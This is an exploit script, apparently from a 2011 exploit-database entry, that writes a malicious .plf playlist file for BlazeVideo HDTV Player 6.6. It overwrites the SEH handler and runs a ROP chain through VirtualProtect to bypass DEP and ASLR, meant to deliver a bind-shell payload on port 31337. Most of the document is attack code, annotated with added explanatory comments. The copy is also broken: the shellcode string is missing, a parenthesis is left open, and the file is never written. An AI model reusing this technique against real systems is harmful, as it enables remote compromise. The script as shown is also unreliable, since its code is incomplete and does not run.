BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass

Publish Date: 07 Oct 2011
Author: modpr0be

                # Exploit Title: BlazeVideo HDTV Player 6.6 Professional (Universal DEP+ASLR Bypass)
# Author: modpr0be
# Software Download:
# Date: 07/10/2011
# Tested on: Windows XP SP3, Windows Vista SP2, Windows 7 SP1
# Thanks: corelanc0d3r, cyb3r.anbu, otoy, sickness, 5m7x, loneferret, _sinn3r, mr_me

# Take a look at :) awesome tool developed by corelanc0d3r and his team: 

# this is an old bug; I just tried to make the exploit universal :)
# it has also been exploited by:
# Greg Linares:
# LiquidWorm:
# hack4love:
# ThEg0bL!N:


import struct
# Output file name. NOTE: `file` shadows the Python 2 builtin of the same name;
# harmless here, but a distinct name (e.g. out_path) would be clearer.
file = 'blazevideo-universal.plf'

# Intended size of the generated payload. Note that the trailing filler below
# (`sisa`) is computed against this value WITHOUT counting `junk` and `align`,
# so the file actually written is 872 + 136 + 5000 = 6008 bytes, not 5000.
totalsize = 5000
# Offset from the start of the file to the SEH record, then the gap between
# the record and the first ROP gadget (offsets as measured by the author;
# they are not re-derived here).
junk = 'A' * 872
align = 'B' * 136

#we don't need nseh
# The SEH handler pointer is overwritten with a stack-pivot gadget (ADD ESP,800
# # RETN) instead of a classic POP/POP/RET, so the next RETN lands inside the
# ROP chain below; the nSEH slot is therefore left to the junk bytes.
seh = struct.pack('<L', 0x6130534a) 	 # ADD ESP,800 # RETN    ** [DTVDeviceManager.dll]
# ROP chain. All gadgets are taken from the application's own modules
# (DTVDeviceManager.dll, MediaPlayerCtrl.dll, EPG.dll, SkinScrollBar.Dll,
# AviosoftDTV.exe) at hard-coded addresses; the "universal ASLR bypass" in the
# title presumably rests on those modules loading at fixed addresses on every
# listed OS (i.e. not built with /DYNAMICBASE) -- confirm against the module
# headers. Defensive takeaway: rebuilding/rebasing those modules with ASLR
# enabled removes the fixed gadget addresses the chain depends on.
#
# Overall shape (the standard PUSHAD pattern): registers are loaded with the
# VirtualProtect() arguments and the PUSHAD # RETN at the end turns them into
# a call frame -- ESI = &VirtualProtect, EBP = "push esp # ret" (return into
# the now-executable stack), EBX = dwSize, EDX = flNewProtect, ECX =
# lpOldProtect, EDI = ROP NOP, EAX = nop bytes executed after the call.
rop = struct.pack('<L', 0x61326003) * 10 # RETN (ROP NOP) [DTVDeviceManager.dll]
# Fetch the real VirtualProtect address through the IAT pointer: EDX = IAT
# slot, EAX = EDX, ECX = [EDX] (function address), then move ECX into ESI.
rop+= struct.pack('<L', 0x6405347a)	 # POP EDX # RETN 	** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0x10011108)	 # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll]
rop+= struct.pack('<L', 0x64010503)	 # PUSH EDX # POP EAX # POP ESI # RETN    ** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0x41414141)	 # Filler (compensate)
rop+= struct.pack('<L', 0x6160949f) 	 # MOV ECX,DWORD PTR DS:[EDX] # POP ESI # POP EBP # MOV DWORD PTR DS:[EAX],ECX # POP EBX # RETN 0C    ** [EPG.dll]
rop+= struct.pack('<L', 0x41414141) * 3	 # Filler (compensate)
rop+= struct.pack('<L', 0x61604218) 	 # PUSH ECX # ADD AL,5F # XOR EAX,EAX # POP ESI # RETN 0C    ** [EPG.dll]
rop+= struct.pack('<L', 0x41414141) * 3  # Filler (RETN offset compensation)
# EBP = "push esp # ret": VirtualProtect returns here, which then jumps to
# the stack (the nop sled / shellcode).
rop+= struct.pack('<L', 0x6403d1a6)	 # POP EBP # RETN [MediaPlayerCtrl.dll] 
rop+= struct.pack('<L', 0x41414141) * 3  # Filler (RETN offset compensation)
rop+= struct.pack('<L', 0x6161055A)	 # & push esp #  ret 0c [EPG.dll]
# dwSize (EBX) and flNewProtect (EDX) are produced by adding a constant to a
# large value so that the wrapped 32-bit result is the small target:
# 0xA139799D + 0x5EC68B64 = 0x00000501 and 0xA13974DC + 0x5EC68B64 =
# 0x00000040 -- this keeps NUL bytes out of the file contents.
rop+= struct.pack('<L', 0x61323EA8) 	 # POP EAX # RETN    ** [DTVDeviceManager.dll]
rop+= struct.pack('<L', 0xA139799D) 	 # 0x00000501-> ebx
rop+= struct.pack('<L', 0x640203fc) 	 # ADD EAX,5EC68B64 # RETN    ** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0x6163d37b) 	 # PUSH EAX # ADD AL,5E # POP EBX # RETN    ** [EPG.dll]
rop+= struct.pack('<L', 0x61626807) 	 # XOR EAX,EAX # RETN    ** [EPG.dll]
rop+= struct.pack('<L', 0x640203fc) 	 # ADD EAX,5EC68B64 # RETN    ** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0x6405347a) 	 # POP EDX # RETN    ** [MediaPlayerCtrl.dll]
rop+= struct.pack('<L', 0xA13974DC)	 # 0x00000040-> edx
rop+= struct.pack('<L', 0x613107fb) 	 # ADD EDX,EAX # MOV EAX,EDX # RETN    ** [DTVDeviceManager.dll]
# ECX = lpOldProtect: any writable address will do for the out-parameter.
rop+= struct.pack('<L', 0x61601fc0)	 # POP ECX # RETN [EPG.dll]
rop+= struct.pack('<L', 0x60350340)	 # &Writable location [AviosoftDTV.exe]
# EDI = ROP NOP (first thing RETN'd into after PUSHAD), EAX = nops.
rop+= struct.pack('<L', 0x61329e07)	 # POP EDI # RETN [DTVDeviceManager.dll] 
rop+= struct.pack('<L', 0x61326003)	 # RETN (ROP NOP) [DTVDeviceManager.dll]
rop+= struct.pack('<L', 0x61606595)	 # POP EAX # RETN ** [EPG.dll] 
rop+= struct.pack('<L', 0x90909090)	 # nop
rop+= struct.pack('<L', 0x61620CF1)	 # PUSHAD # RETN [EPG.dll] 

# Short nop sled between the chain and the shellcode.
nop = '\x90' * 32

# windows/shell_bind_tcp - 368 bytes
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=31337, RHOST=, EXITFUNC=process, 

# NOTE: the string literal for the shellcode is missing from this copy of the
# script -- the parenthesis opened here is never closed, so the file as shown
# does not parse. The 368-byte size in the comment above is the only record
# of what was here.
shellcode = (

# Trailing filler ("sisa", likely Indonesian for "remainder"); see the note
# on `totalsize` about the resulting file length.
sisa = 'C' * (totalsize - len(seh+rop+nop+shellcode))
payload = junk+seh+align+rop+nop+shellcode+sisa

# The file is opened for writing, but no f.write(payload) / f.close() appears
# in this copy -- presumably lost along with the shellcode literal. A `with`
# block would also guarantee the handle is closed.
f = open(file,'w')
# Python 2 print statements.
print "Author: modpr0be"
print "File",file, "successfully created"